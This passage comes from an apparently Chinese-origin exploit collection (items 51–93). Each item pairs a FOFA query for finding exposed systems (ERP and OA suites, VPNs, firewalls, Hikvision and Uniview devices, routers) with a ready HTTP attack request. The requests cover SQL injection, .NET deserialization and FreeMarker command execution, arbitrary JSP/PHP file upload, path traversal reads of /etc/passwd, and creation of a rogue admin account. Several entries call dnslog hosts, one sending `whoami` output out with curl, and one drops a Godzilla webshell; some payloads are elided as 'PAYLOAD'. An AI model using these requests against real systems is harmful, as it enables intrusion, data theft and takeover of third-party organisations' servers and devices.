FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微 E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Note: the heading in the source says file upload, but the only request it gives is an encoded directory-traversal read of /etc/passwd.

54. 畅捷通 T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL; the marker string in the response confirms execution:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通 T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通 T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

Same ObjectDataProvider -> Process gadget as item 54, reached through a different AjaxPro handler; a DNS hit for the ping confirms execution without writing a file.

57. 畅捷通 T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

